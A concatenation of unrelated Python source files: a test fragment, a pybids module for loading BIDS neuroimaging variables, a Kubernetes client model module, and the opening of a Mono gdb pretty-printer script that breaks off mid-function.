            configs={('hello', 'world'): 'foo'})
        result = build_file_processor.process(build_file.path, set())
        # assertEqual instead of the deprecated assertEquals alias.
        self.assertEqual(
            get_config_from_results(result),
            {'hello': {'world': 'foo', 'bar': None, 'goo': None}})
|
|
""" Tools for reading/writing BIDS data files. """
from os.path import join
import warnings
import json
import numpy as np
import pandas as pd
from bids.utils import listify
from .entities import NodeIndex
from .variables import SparseRunVariable, DenseRunVariable, SimpleVariable
BASE_ENTITIES = ['subject', 'session', 'task', 'run']
ALL_ENTITIES = BASE_ENTITIES + ['datatype', 'suffix', 'acquisition']
def load_variables(layout, types=None, levels=None, skip_empty=True,
                   dataset=None, scope='all', **kwargs):
    """A convenience wrapper for one or more load_*_variables() calls.
    Parameters
    ----------
    layout : :obj:`bids.layout.BIDSLayout`
        BIDSLayout containing variable files.
    types : str or list
        Types of variables to retrieve. All valid values
        reflect the filename stipulated in the BIDS spec for each kind of
        variable. Valid values include: 'events', 'physio', 'stim',
        'scans', 'participants', 'sessions', and 'regressors'.
    levels : str or list
        Optional level(s) of variables to load. Valid
        values are 'run', 'session', 'subject', or 'dataset'. This is
        simply a shorthand way to specify types--e.g., 'run' will be
        converted to types=['events', 'physio', 'stim', 'regressors'].
    skip_empty : bool
        Whether or not to skip empty Variables (i.e.,
        where there are no rows/records in a file after applying any
        filtering operations like dropping NaNs).
    dataset : NodeIndex
        An existing NodeIndex container to store the
        loaded data in. Can be used to iteratively construct a dataset
        that contains otherwise heterogeneous sets of variables. If None,
        a new NodeIndex is used.
    scope : str or list
        The scope of the space to search for variables. See
        docstring for BIDSLayout for details and valid predefined values.
    kwargs : dict
        Optional keyword arguments to pass onto the individual
        load_*_variables() calls.
    Returns
    -------
    A NodeIndex instance.
    Examples
    --------
    >>> load_variables(layout, ['events', 'physio'], subject='01')  # doctest: +SKIP
    # returns all variables stored in _events.tsv and _physio.tsv.gz files
    # for runs that belong to subject with id '01'.
    """
    TYPES = ['events', 'physio', 'stim', 'scans', 'participants', 'sessions',
             'regressors']
    types = listify(types)
    if types is None:
        if levels is not None:
            types = []
            lev_map = {
                'run': ['events', 'physio', 'stim', 'regressors'],
                'session': ['scans'],
                'subject': ['sessions'],
                'dataset': ['participants']
            }
            # Plain loop (instead of a side-effect list comprehension) to
            # accumulate the types implied by each requested level.
            for lev in listify(levels):
                types.extend(lev_map[lev.lower()])
        else:
            types = TYPES
    bad_types = set(types) - set(TYPES)
    if bad_types:
        raise ValueError("Invalid variable types: %s" % bad_types)
    dataset = dataset or NodeIndex()
    # Run-level loaders are invoked once, with boolean flags disabling the
    # run-level types that were NOT requested.
    run_types = list({'events', 'physio', 'stim', 'regressors'} - set(types))
    type_flags = {t: False for t in run_types}
    if len(type_flags) < 4:
        _kwargs = kwargs.copy()
        _kwargs.update(type_flags)
        dataset = _load_time_variables(layout, dataset, scope=scope, **_kwargs)
    for t in ({'scans', 'sessions', 'participants'} & set(types)):
        kwargs.pop('suffix', None)  # suffix is always one of the values above
        dataset = _load_tsv_variables(layout, t, dataset, scope=scope,
                                      **kwargs)
    return dataset
def _get_nvols(img_f):
    """Return the number of volumes (time points) in image file *img_f*.

    Supports NIfTI (4th dimension), CIFTI-2 (length of the series axis),
    and GIFTI (count of 'time series' data arrays).
    """
    import nibabel as nb
    img = nb.load(img_f)
    nvols = 0
    if isinstance(img, nb.Nifti1Pair):
        nvols = img.shape[3]
    elif isinstance(img, nb.Cifti2Image):
        for ax in map(img.header.get_axis, range(len(img.header.matrix))):
            if isinstance(ax, nb.cifti2.SeriesAxis):
                nvols = ax.size
                break
        else:
            raise ValueError("No series axis found in %s" % img_f)
    elif isinstance(img, nb.GiftiImage):
        nvols = len(img.get_arrays_from_intent('time series'))
    else:
        # Parenthesize the format args: previously img_f was passed as a
        # second argument to ValueError instead of into the format string,
        # so formatting raised TypeError ("not enough arguments") instead.
        raise ValueError("Unknown image type %s: %s" % (img.__class__, img_f))
    return nvols
def _load_time_variables(layout, dataset=None, columns=None, scan_length=None,
                         drop_na=True, events=True, physio=True, stim=True,
                         regressors=True, skip_empty=True, scope='all',
                         **selectors):
    """Loads all variables found in *_events.tsv files and returns them as a
    BIDSVariableCollection.
    Parameters
    ----------
    layout : :obj:`bids.layout.BIDSLayout`
        A BIDSLayout to scan.
    dataset : NodeIndex
        A BIDS NodeIndex container. If None, a new one is
        initialized.
    columns : list
        Optional list of names specifying which columns in the
        event files to read. By default, reads all columns found.
    scan_length : float
        Optional duration of runs (in seconds). By
        default, this will be extracted from the BOLD image. However, in
        cases where the user doesn't have access to the images (e.g.,
        because only file handles are locally available), a fixed duration
        can be manually specified as a fallback.
    drop_na : bool
        If True, removes all events where amplitude is n/a. If
        False, leaves n/a values intact. Note that in the latter case,
        transformations that requires numeric values may fail.
    events : bool
        If True, extracts variables from events.tsv files.
    physio : bool
        If True, extracts variables from _physio files.
    stim : bool
        If True, extracts variables from _stim files.
    regressors : bool
        If True, extracts variables from *_regressors.tsv files.
    skip_empty : bool
        Whether or not to skip empty Variables (i.e.,
        where there are no rows/records in a file, or all onsets,
        durations, and amplitudes are 0).
    scope : str or list
        The scope of the space to search for variables. See
        docstring for BIDSLayout for details and valid predefined values.
    selectors : dict
        Optional keyword arguments passed on to the
        BIDSLayout instance's get() method; can be used to constrain
        which data are loaded.
    Returns
    -------
    A NodeIndex instance.
    """
    # Extract any non-keyword arguments
    selectors = selectors.copy()
    if dataset is None:
        dataset = NodeIndex()
    selectors['datatype'] = 'func'
    selectors['suffix'] = 'bold'
    exts = selectors.pop('extension', ['.nii', '.nii.gz', '.func.gii', '.dtseries.nii'])
    images = layout.get(return_type='object', scope=scope, extension=exts, **selectors)
    if not images:
        raise ValueError("No functional images that match criteria found.")
    # Main loop over images
    for img_obj in images:
        entities = img_obj.entities
        img_f = img_obj.path
        # Run is not mandatory, but we need a default for proper indexing
        if 'run' in entities:
            entities['run'] = int(entities['run'])
        tr = img_obj.get_metadata()["RepetitionTime"]
        # Get duration of run: first try to get it directly from the image
        # header; if that fails, look for a scan_length argument.
        try:
            nvols = _get_nvols(img_f)
            duration = nvols * tr
        except Exception as e:
            if scan_length is not None:
                duration = scan_length
            else:
                msg = ("Unable to extract scan duration from one or more "
                       "BOLD runs, and no scan_length argument was provided "
                       "as a fallback. Please check that the image files are "
                       "available, or manually specify the scan duration.")
                raise ValueError(msg) from e
        # We don't want to pass all the image file's entities onto get_node(),
        # as there can be unhashable nested slice timing values, and this also
        # slows down querying unnecessarily. Instead, pick out files only based
        # on the core BIDS entities and any entities explicitly passed as
        # selectors.
        # TODO: one downside of this approach is the stripped entities also
        # won't be returned in the resulting node due to the way things are
        # implemented. Consider adding a flag to control this.
        select_on = {k: v for (k, v) in entities.items()
                     if k in BASE_ENTITIES or k in selectors}
        # If a matching node already exists, return it
        result = dataset.get_nodes('run', select_on)
        if result:
            if len(result) > 1:
                raise ValueError("More than one existing Node matches the "
                                 "specified entities! You may need to pass "
                                 "additional selectors to narrow the search.")
            run_info = result[0].get_info()
        else:
            # Otherwise create a new node and use that.
            # We first convert any entity values that are currently collections to
            # JSON strings to prevent nasty hashing problems downstream. Note that
            # isinstance() isn't as foolproof as actually trying to hash the
            # value, but the latter is likely to be slower, and since values are
            # coming from JSON or filenames, there's no real chance of encountering
            # anything but a list or dict.
            entities = {
                k: (json.dumps(v) if isinstance(v, (list, dict)) else v)
                for (k, v) in entities.items()
            }
            run = dataset.create_node('run', entities, image_file=img_f,
                                      duration=duration, repetition_time=tr)
            run_info = run.get_info()
        # Process event files
        if events:
            dfs = layout.get_nearest(
                img_f, extension='.tsv', suffix='events', all_=True,
                full_search=True, ignore_strict_entities=['suffix', 'extension'])
            for _data in dfs:
                _data = pd.read_csv(_data, sep='\t')
                if 'amplitude' in _data.columns:
                    if (_data['amplitude'].astype(int) == 1).all() and \
                            'trial_type' in _data.columns:
                        msg = ("Column 'amplitude' with constant value 1 "
                               "is unnecessary in event files; ignoring it.")
                        _data = _data.drop('amplitude', axis=1)
                    else:
                        msg = ("Column name 'amplitude' is reserved; "
                               "renaming it to 'amplitude_'.")
                        _data = _data.rename(
                            columns={'amplitude': 'amplitude_'})
                    warnings.warn(msg)
                _data = _data.replace('n/a', np.nan)  # Replace BIDS' n/a
                _data = _data.apply(pd.to_numeric, errors='ignore')
                _cols = columns or list(set(_data.columns.tolist()) -
                                        {'onset', 'duration'})
                # Construct a DataFrame for each extra column
                for col in _cols:
                    df = _data[['onset', 'duration']].copy()
                    df['amplitude'] = _data[col].values
                    # Add in all of the run's entities as new columns for
                    # index
                    for entity, value in entities.items():
                        if entity in ALL_ENTITIES:
                            df[entity] = value
                    if drop_na:
                        df = df.dropna(subset=['amplitude'])
                    if df.empty:
                        continue
                    var = SparseRunVariable(
                        name=col, data=df, run_info=run_info, source='events')
                    run.add_variable(var)
        # Process confound files
        if regressors:
            sub_ents = {k: v for k, v in entities.items()
                        if k in BASE_ENTITIES}
            confound_files = layout.get(suffix='regressors', scope=scope,
                                        **sub_ents)
            for cf in confound_files:
                _data = pd.read_csv(cf.path, sep='\t', na_values='n/a')
                if columns is not None:
                    conf_cols = list(set(_data.columns) & set(columns))
                    _data = _data.loc[:, conf_cols]
                for col in _data.columns:
                    sr = 1. / run.repetition_time
                    var = DenseRunVariable(name=col, values=_data[[col]],
                                           run_info=run_info, source='regressors',
                                           sampling_rate=sr)
                    run.add_variable(var)
        # Process recording files (physio and/or stim)
        rec_types = []
        if physio:
            rec_types.append('physio')
        if stim:
            rec_types.append('stim')
        if rec_types:
            rec_files = layout.get_nearest(
                img_f, extension='.tsv.gz', all_=True, suffix=rec_types,
                ignore_strict_entities=['suffix', 'extension'], full_search=True)
            for rf in rec_files:
                metadata = layout.get_metadata(rf)
                if not metadata:
                    raise ValueError("No .json sidecar found for '%s'." % rf)
                data = pd.read_csv(rf, sep='\t')
                freq = metadata['SamplingFrequency']
                st = metadata['StartTime']
                rf_cols = metadata['Columns']
                data.columns = rf_cols
                # Filter columns if user passed names
                if columns is not None:
                    rf_cols = list(set(rf_cols) & set(columns))
                    data = data.loc[:, rf_cols]
                n_cols = len(rf_cols)
                if not n_cols:
                    continue
                # Keep only in-scan samples
                if st < 0:
                    # int() is required: np.floor returns a float, and
                    # NumPy rejects non-integer slice indices.
                    start_ind = int(np.floor(-st * freq))
                    values = data.values[start_ind:, :]
                else:
                    values = data.values
                # Zero-pad the head if recording starts after scan onset
                if st > 0:
                    n_pad = int(freq * st)
                    pad = np.zeros((n_pad, n_cols))
                    values = np.r_[pad, values]
                # Truncate or zero-pad the tail to exactly the run duration
                n_rows = int(run.duration * freq)
                if len(values) > n_rows:
                    values = values[:n_rows, :]
                elif len(values) < n_rows:
                    pad = np.zeros((n_rows - len(values), n_cols))
                    values = np.r_[values, pad]
                df = pd.DataFrame(values, columns=rf_cols)
                source = 'physio' if '_physio.tsv' in rf else 'stim'
                for col in df.columns:
                    var = DenseRunVariable(name=col, values=df[[col]], run_info=run_info,
                                           source=source, sampling_rate=freq)
                    run.add_variable(var)
    return dataset
def _load_tsv_variables(layout, suffix, dataset=None, columns=None,
                        prepend_type=False, scope='all', **selectors):
    """Reads variables from scans.tsv, sessions.tsv, and participants.tsv.
    Parameters
    ----------
    layout : :obj:`bids.layout.BIDSLayout`
        The BIDSLayout to use.
    suffix : str
        The suffix of file to read from. Must be one of 'scans',
        'sessions', or 'participants'.
    dataset : NodeIndex
        A BIDS NodeIndex container. If None, a new one is
        initialized.
    columns : list
        Optional list of names specifying which columns in the
        files to return. If None, all columns are returned.
    prepend_type : bool
        If True, variable names are prepended with the
        type name (e.g., 'age' becomes 'participants.age').
    scope : str or list
        The scope of the space to search for variables. See
        docstring for BIDSLayout for details and valid predefined values.
    selectors : dict
        Optional keyword arguments passed onto the
        BIDSLayout instance's get() method; can be used to constrain
        which data are loaded.
    Returns
    -------
    A NodeIndex instance.
    """
    # Sanitize the selectors: only keep entities at current level or above
    remap = {'scans': 'run', 'sessions': 'session', 'participants': 'subject'}
    level = remap[suffix]
    # Entities strictly above the current level in the BIDS hierarchy
    valid_entities = BASE_ENTITIES[:BASE_ENTITIES.index(level)]
    layout_kwargs = {k: v for k, v in selectors.items() if k in valid_entities}
    if dataset is None:
        dataset = NodeIndex()
    files = layout.get(extension='.tsv', suffix=suffix, scope=scope,
                       **layout_kwargs)
    for f in files:
        _data = f.get_df(include_timing=False)
        # Entities can be defined either within the first column of the .tsv
        # file (for entities that vary by row), or from the full file path
        # (for entities constant over all rows in the file). We extract both
        # and store them in the main DataFrame alongside other variables (as
        # they'll be extracted when the BIDSVariable is initialized anyway).
        for ent_name, ent_val in f.entities.items():
            if ent_name in ALL_ENTITIES:
                _data[ent_name] = ent_val
        # Handling is a bit more convoluted for scans.tsv, because the first
        # column contains the run filename, which we also need to parse.
        if suffix == 'scans':
            # Suffix is guaranteed to be present in each filename, so drop the
            # constant column with value 'scans' to make way for it and prevent
            # two 'suffix' columns.
            _data.drop(columns=['suffix'], inplace=True)
            image = _data['filename']
            _data = _data.drop('filename', axis=1)
            dn = f.dirname
            paths = [join(dn, p) for p in image.values]
            # Parse entities out of each referenced image file's path
            ent_recs = [dict(layout.files[p].entities) for p in paths
                        if p in layout.files]
            ent_cols = pd.DataFrame.from_records(ent_recs)
            # Remove entity columns found in both DFs
            dupes = list(set(ent_cols.columns) & set(_data.columns))
            to_drop = ['extension'] + dupes
            ent_cols.drop(columns=to_drop, inplace=True)
            _data = pd.concat([_data, ent_cols], axis=1, sort=True)
            # The BIDS spec requires ID columns to be named 'session_id', 'run_id',
            # etc., and IDs begin with entity prefixes (e.g., 'sub-01'). To ensure
            # consistent internal handling, we strip these suffixes and prefixes.
        elif suffix == 'sessions':
            _data = _data.rename(columns={'session_id': 'session'})
            _data['session'] = _data['session'].str.replace('ses-', '')
        elif suffix == 'participants':
            _data = _data.rename(columns={'participant_id': 'subject'})
            _data['subject'] = _data['subject'].str.replace('sub-', '')
        def make_patt(x, regex_search=False):
            # Build a regex pattern matching selector value x against a column
            patt = '%s' % x
            if isinstance(x, (int, float)):
                # allow for leading zeros if a number was specified
                # regardless of regex_search
                patt = '0*' + patt
            if not regex_search:
                # Exact match unless the layout enables regex searching
                patt = '^%s$' % patt
            return patt
        # Filter rows on all selectors
        comm_cols = list(set(_data.columns) & set(selectors.keys()))
        for col in comm_cols:
            ent_patts = [make_patt(x, regex_search=layout.regex_search)
                         for x in listify(selectors.get(col))]
            patt = '|'.join(ent_patts)
            _data = _data[_data[col].str.contains(patt)]
        # Each suffix attaches variables one level above its own rows
        level = {'scans': 'session', 'sessions': 'subject',
                 'participants': 'dataset'}[suffix]
        node = dataset.get_or_create_node(level, f.entities)
        ent_cols = list(set(ALL_ENTITIES) & set(_data.columns))
        amp_cols = list(set(_data.columns) - set(ent_cols))
        if columns is not None:
            amp_cols = list(set(amp_cols) & set(columns))
        for col_name in amp_cols:
            # Rename colummns: values must be in 'amplitude'
            df = _data.loc[:, [col_name] + ent_cols]
            df.columns = ['amplitude'] + ent_cols
            if prepend_type:
                col_name = '%s.%s' % (suffix, col_name)
            node.add_variable(SimpleVariable(name=col_name, data=df, source=suffix))
    return dataset
|
|
#!/usr/bin/env python
# -*- coding: utf-8
# Copyright 2017-2019 The FIAAS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import json
import logging
from collections import namedtuple
import six
from . import config
from .client import Client, NotFound
from .fields import Field
LOG = logging.getLogger(__name__)
LOG.addHandler(logging.NullHandler())
class MetaModel(type):
    """Metaclass for Model
    Responsibilities:
    * Creating the _meta attribute, with url_template (if present), list of fields
    and for convenience, a list of field names.
    * Creates properties for name and namespace if the instance has a metadata field.
    * Mixes in ApiMixIn if the Model has a Meta attribute, indicating a top level
    Model (not to be confused with _meta).
    """
    @staticmethod
    def __new__(mcs, cls, bases, attrs):
        # A "Meta" inner class marks a top-level model; pop it so it does
        # not remain as an attribute of the final class.
        attr_meta = attrs.pop("Meta", None)
        if attr_meta:
            # Top-level models gain the API helper methods from ApiMixIn.
            bases += (ApiMixIn,)
        meta = {
            "url_template": getattr(attr_meta, "url_template", ""),
            "list_url": getattr(attr_meta, "list_url", ""),
            "watch_list_url": getattr(attr_meta, "watch_list_url", ""),
            "watch_list_url_template": getattr(attr_meta, "watch_list_url_template", ""),
            "fields": [],
            "field_names": []
        }
        field_names = meta["field_names"]
        fields = meta["fields"]
        # Collect every Field declared on the class body.
        for k, v in list(attrs.items()):
            if isinstance(v, Field):
                # A Field declared without an explicit name takes the
                # attribute name it was assigned to.
                if v.name == "__unset__":
                    v.name = k
                v.attr_name = k
                field_names.append(k)
                fields.append(v)
        # Expose the collected metadata as an immutable namedtuple on _meta.
        Meta = namedtuple("Meta", meta.keys())
        attrs["_meta"] = Meta(**meta)
        return super(MetaModel, mcs).__new__(mcs, cls, bases, attrs)
class ApiMixIn(object):
    """ApiMixIn class for top level Models
    Contains methods for working with the API
    """
    # Single shared HTTP client for all models.
    _client = Client()
    @classmethod
    def _build_url(cls, **kwargs):
        # Fill the class's url_template (e.g. name/namespace placeholders).
        return cls._meta.url_template.format(**kwargs)
    @classmethod
    def find(cls, name="", namespace="default", labels=None):
        """Find resources using label selection
        :param: :py:class:`str` name: The name of the resource, as indicated by the `app` label
        :param: :py:class:`str` namespace: The namespace to search in
        :param: :py:class:`dict` labels: More advanced label selection (see below)
        :returns: A list of matching objects
        When a `labels` dictionary is supplied, the `name` parameter is ignored.
        See the docs for _label_selector for more details
        """
        if namespace is None:
            if not cls._meta.list_url:
                raise NotImplementedError("Cannot find without namespace, no list_url defined on class {}".format(cls))
            url = cls._meta.list_url
        else:
            url = cls._build_url(name="", namespace=namespace)
        if not labels:
            # Fall back to matching on the conventional `app` label.
            labels = {"app": Equality(name)}
        selector = cls._label_selector(labels)
        resp = cls._client.get(url, params={"labelSelector": selector})
        return [cls.from_dict(item) for item in resp.json()[u"items"]]
    @classmethod
    def list(cls, namespace="default"):
        """List all resources in given namespace
        :param: :py:class:`str` namespace: The namespace to list, or None for the cluster-wide list_url
        :returns: A list of model instances
        """
        if namespace is None:
            if not cls._meta.list_url:
                raise NotImplementedError("Cannot list without namespace, no list_url defined on class {}".format(cls))
            url = cls._meta.list_url
        else:
            url = cls._build_url(name="", namespace=namespace)
        resp = cls._client.get(url)
        return [cls.from_dict(item) for item in resp.json()[u"items"]]
    @classmethod
    def watch_list(cls, namespace=None):
        """Return a generator that yields WatchEvents of cls"""
        if namespace:
            if cls._meta.watch_list_url_template:
                url = cls._meta.watch_list_url_template.format(namespace=namespace)
            else:
                raise NotImplementedError(
                    "Cannot watch_list with namespace, no watch_list_url_template defined on class {}".format(cls))
        else:
            url = cls._meta.watch_list_url
            if not url:
                raise NotImplementedError("Cannot watch_list, no watch_list_url defined on class {}".format(cls))
        # Streaming GET; each non-empty line is one JSON-encoded watch event.
        resp = cls._client.get(url, stream=True, timeout=config.stream_timeout)
        for line in resp.iter_lines(chunk_size=None):
            if line:
                try:
                    event_json = json.loads(line)
                    event = WatchEvent(event_json, cls)
                    yield event
                except ValueError:
                    # Malformed event: log and keep the stream alive.
                    LOG.exception("Unable to parse JSON on watch event, discarding event. Line: %r", line)
    @classmethod
    def get(cls, name, namespace="default"):
        """Get from API server if it exists
        :raises NotFound: if the resource does not exist (propagated from the client)
        """
        url = cls._build_url(name=name, namespace=namespace)
        resp = cls._client.get(url)
        instance = cls.from_dict(resp.json())
        return instance
    @classmethod
    def get_or_create(cls, **kwargs):
        """If exists, get from API, else create new instance
        NOTE: kwargs must include a `metadata` object carrying name/namespace.
        The returned instance is not persisted; call save() to write it back.
        """
        try:
            metadata = kwargs.get("metadata")
            instance = cls.get(metadata.name, metadata.namespace)
            # Overlay the supplied field values on the fetched instance.
            for field in cls._meta.fields:
                field.set(instance, kwargs)
            return instance
        except NotFound:
            return cls(new=True, **kwargs)
    @classmethod
    def delete(cls, name, namespace="default", **kwargs):
        """Delete the named resource"""
        url = cls._build_url(name=name, namespace=namespace)
        cls._client.delete(url, **kwargs)
    @classmethod
    def delete_list(cls, namespace="default", labels=None, delete_options=None, **kwargs):
        # Delete every resource in `namespace` matching `labels`.
        # NOTE(review): labels=None reaches _label_selector and would raise a
        # TypeError there -- callers appear expected to always pass labels; confirm.
        selector = cls._label_selector(labels)
        url = cls._build_url(name="", namespace=namespace)
        if delete_options:
            delete_options = delete_options.as_dict()
        cls._client.delete(url, body=delete_options, params={"labelSelector": selector}, **kwargs)
    def save(self):
        """Save to API server, either update if existing, or create if new"""
        if self._new:
            # POST to the collection URL creates the resource.
            url = self._build_url(name="", namespace=self.metadata.namespace)
            resp = self._client.post(url, self.as_dict())
            self._new = False
        else:
            # PUT to the resource URL replaces it.
            url = self._build_url(name=self.metadata.name, namespace=self.metadata.namespace)
            resp = self._client.put(url, self.as_dict())
        # Refresh local state from the server's authoritative response.
        self.update_from_dict(resp.json())
    @staticmethod
    def _label_selector(labels):
        """ Build a labelSelector string from a collection of key/values. The parameter can be either
        a dict, or a list of (key, value) tuples (this allows for repeating a key).
        The keys/values are used to build the `labelSelector` parameter to the API,
        and supports all the operations of the API through the use of :py:class:`~k8s.base.LabelSelector`.
        Each key is a label name. The value defines which operation to perform.
        Operations that take a single string value:
        - :py:class:`~k8s.base.Equality`
        - :py:class:`~k8s.base.Inequality`
        A plain string will automatically be wrapped by :py:class:`~k8s.base.Equality` for compatability
        with older versions of this method.
        Operations that take a sequence of string values:
        - :py:class:`~k8s.base.In`
        - :py:class:`~k8s.base.NotIn`
        Operations that takes no value:
        - :py:class:`~k8s.base.Exists`
        """
        if hasattr(labels, "items"):
            # Sort dict items for a deterministic selector string.
            labels = sorted(labels.items(), key=lambda kv: kv[0])
        return ",".join("{}{}".format(k, v if isinstance(v, LabelSelector) else Equality(v)) for k, v in labels)
class Model(six.with_metaclass(MetaModel)):
    """A kubernetes Model object

    Contains fields for each attribute in the API specification, and methods
    for export/import.
    """
    def __init__(self, new=True, **kwargs):
        """Initialize declared fields from keyword arguments.

        :param bool new: True if this instance does not yet exist on the API server
        :raises TypeError: if a keyword does not match a declared field, or
            (for new instances only) a field value fails validation
        """
        self._new = new
        self._values = {}
        kwarg_names = set(kwargs.keys())
        for field in self._meta.fields:
            kwarg_names.discard(field.name)
            field.set(self, kwargs)
            if field.type == SelfModel:
                # Resolve the SelfModel placeholder to the concrete class the
                # field was declared in (allows self-referencing models).
                field.type = self.__class__
                field.default_value_create_instance = False
        if kwarg_names:
            raise TypeError(
                "{}() got unexpected keyword-arguments: {}".format(self.__class__.__name__, ", ".join(kwarg_names)))
        if self._new:
            self._validate_fields()
    def _validate_fields(self):
        """Raise TypeError if any field holds an invalid value."""
        for field in self._meta.fields:
            if not field.is_valid(self):
                raise TypeError("Value of field {} is not valid on {}".format(field.name, self))
    def as_dict(self):
        """Serialize to a plain dict for the API, or None if every field
        still holds its default value."""
        if all(getattr(self, field.attr_name) == field.default_value for field in self._meta.fields):
            return None
        d = {}
        for field in self._meta.fields:
            value = field.dump(self)
            if value is not None:
                d[_api_name(field.name)] = value
        return d
    def merge(self, other):
        """
        `merge` sets each field in `self` to the value provided by `other`
        This is mostly equivalent to just replacing `self` with `other`,
        except read only fields in `self` are preserved.
        """
        for field in self._meta.fields:
            setattr(self, field.name, getattr(other, field.name))
    update = merge  # For backwards compatibility
    def update_from_dict(self, d):
        """Load and validate field values from a dict as returned by the API."""
        for field in self._meta.fields:
            field.load(self, d.get(_api_name(field.name)))
        self._validate_fields()
    @classmethod
    def from_dict(cls, d):
        """Create an instance (marked as already persisted) from an API dict."""
        instance = cls(new=False)
        instance.update_from_dict(d)
        return instance
    def __repr__(self):
        return "{}({})".format(self.__class__.__name__,
                               ", ".join("{}={}".format(key, getattr(self, key)) for key in self._meta.field_names))
    def __eq__(self, other):
        try:
            return self.as_dict() == other.as_dict()
        except AttributeError:
            return False
    def __ne__(self, other):
        # BUG FIX: Python 2 does not derive __ne__ from __eq__; without this,
        # `a != b` fell back to identity comparison and could disagree with
        # `a == b`. (This codebase supports py2 via six.)
        return not self == other
def _api_name(name):
return name[1:] if name.startswith("_") else name
class WatchEvent(object):
    """One event from a watch stream: the event kind plus the affected object."""
    ADDED = "ADDED"
    MODIFIED = "MODIFIED"
    DELETED = "DELETED"
    def __init__(self, event_json, cls):
        # `event_json` carries the kind under "type" and the raw resource
        # payload under "object", which is deserialized into a `cls` instance.
        self.type = event_json["type"]
        self.object = cls.from_dict(event_json["object"])
    def __repr__(self):
        return "%s(type=%s, object=%s)" % (self.__class__.__name__, self.type, self.object)
class LabelSelector(object):
    """Base class for label selection operations.

    Subclasses define `operator`; `str()` of an instance renders the
    operator immediately followed by the value, ready to be appended to
    a label name in a labelSelector query.
    """
    #: Operator used in selection query
    operator = None
    def __init__(self, value=""):
        self.value = value
    def __str__(self):
        return "%s%s" % (self.operator, self.value)
class Equality(LabelSelector):
    # Selects resources whose label equals the value: rendered "=<value>".
    operator = "="
class Inequality(LabelSelector):
    # Selects resources whose label differs from the value: rendered "!=<value>".
    operator = "!="
class LabelSetSelector(LabelSelector):
    """Base for set-based selectors; `value` is a sequence of strings."""
    def __str__(self):
        # Rendered as " <op> (v1,v2,...)" after the label name.
        return " {} ({})".format(self.operator, ",".join(self.value))
class In(LabelSetSelector):
    # Label value must be one of the given values.
    operator = "in"
class NotIn(LabelSetSelector):
    # Label value must not be any of the given values.
    operator = "notin"
class Exists(LabelSelector):
    """Matches any resource that has the label, regardless of its value.

    Renders as the empty string: the bare label name emitted by
    _label_selector is itself the existence test.
    """
    def __init__(self):
        super(Exists, self).__init__("")
    def __str__(self):
        return ""
class SelfModel:
    """
    Use `SelfModel` as `Field.type` to set `Field.type` to the model the
    `Field` was defined in during model instantiation.
    This allows models to have fields with their own type, since it is not
    possible to reference a class in its own attribute definitions.
    Example:
    ```
    class MyModel(Model):
        submodel = Field(SelfModel) # submodel gets the type `MyModel`
    ```
    """
    # Sentinel only -- never instantiated; resolved in Model.__init__.
    pass
|
|
#
# Author: Zoltan Varga (vargaz@gmail.com)
# License: MIT/X11
#
#
# This is a mono support mode for gdb 7.0 and later
# Usage:
# - copy/symlink this file to the directory where the mono executable lives.
# - run mono under gdb, or attach to a mono process started with --debug=gdb using gdb.
#
import os
import sys
class StringPrinter:
    "Print a C# string"
    # NOTE: Python 2 script (uses print statements elsewhere); gdb pretty-printer
    # protocol: gdb calls to_string() on a registered printer.
    def __init__(self, val):
        self.val = val
    def to_string(self):
        # Null pointer check via the raw 64-bit value.
        if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
            return "null"
        obj = self.val.cast (gdb.lookup_type ("MonoString").pointer ()).dereference ()
        # NOTE(review): `len` shadows the builtin; harmless here since the
        # builtin is not used below, but worth renaming.
        len = obj ['length']
        chars = obj ['chars']
        i = 0
        res = ['"']
        # Walk the UTF-16 buffer two bytes at a time.
        while i < len:
            val = (chars.cast(gdb.lookup_type ("gint64")) + (i * 2)).cast(gdb.lookup_type ("gunichar2").pointer ()).dereference ()
            if val >= 256:
                # Escape non-Latin-1 chars; "\u" is a literal backslash-u in a py2 str.
                c = "\u%X" % val
            else:
                c = chr (val)
            res.append (c)
            i = i + 1
        res.append ('"')
        return ''.join (res)
def stringify_class_name(ns, name):
    """Return a C#-style display name for class `name` in namespace `ns`.

    A few System types map to their C# keyword aliases; classes in the
    empty namespace are shown bare; everything else as "ns.name".
    """
    aliases = {"Byte": "byte", "String": "string"}
    if ns == "System" and name in aliases:
        return aliases[name]
    if not ns:
        return name
    return "%s.%s" % (ns, name)
class ArrayPrinter:
    "Print a C# array"
    def __init__(self, val, class_ns, class_name):
        self.val = val
        self.class_ns = class_ns
        # class_name ends with "[]"; the suffix is stripped in to_string().
        self.class_name = class_name
    def to_string(self):
        obj = self.val.cast (gdb.lookup_type ("MonoArray").pointer ()).dereference ()
        length = obj ['max_length']
        # Render as "ElementType [n]".
        return "%s [%d]" % (stringify_class_name (self.class_ns, self.class_name [0:len(self.class_name) - 2]), int(length))
class ObjectPrinter:
    "Print a C# object"
    # NOTE: Python 2 only (print statements, py2 iterator protocol below).
    # NOTE(review): the exception handlers reference `sys`, which must be
    # imported at module top -- verify.
    def __init__(self, val):
        # References ("Foo &") need their address taken before the cast.
        if str(val.type)[-1] == "&":
            self.val = val.address.cast (gdb.lookup_type ("MonoObject").pointer ())
        else:
            self.val = val.cast (gdb.lookup_type ("MonoObject").pointer ())
    class _iterator:
        # Iterates (field name, value) pairs for gdb's children() protocol.
        def __init__(self,obj):
            self.obj = obj
            self.iter = self.obj.type.fields ().__iter__ ()
            pass
        def __iter__(self):
            return self
        def next(self):
            # py2 iterator protocol (would be __next__ on py3).
            field = self.iter.next ()
            try:
                if str(self.obj [field.name].type) == "object":
                    # Avoid recursion
                    return (field.name, self.obj [field.name].cast (gdb.lookup_type ("void").pointer ()))
                else:
                    return (field.name, self.obj [field.name])
            except:
                # Superclass
                return (field.name, self.obj.cast (gdb.lookup_type ("%s" % (field.name))))
    def children(self):
        # FIXME: It would be easier if gdb.Value would support iteration itself
        # It would also be better if we could return None
        if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
            return {}.__iter__ ()
        try:
            obj = self.val.dereference ()
            class_ns = obj ['vtable'].dereference ()['klass'].dereference ()['name_space'].string ()
            class_name = obj ['vtable'].dereference ()['klass'].dereference ()['name'].string ()
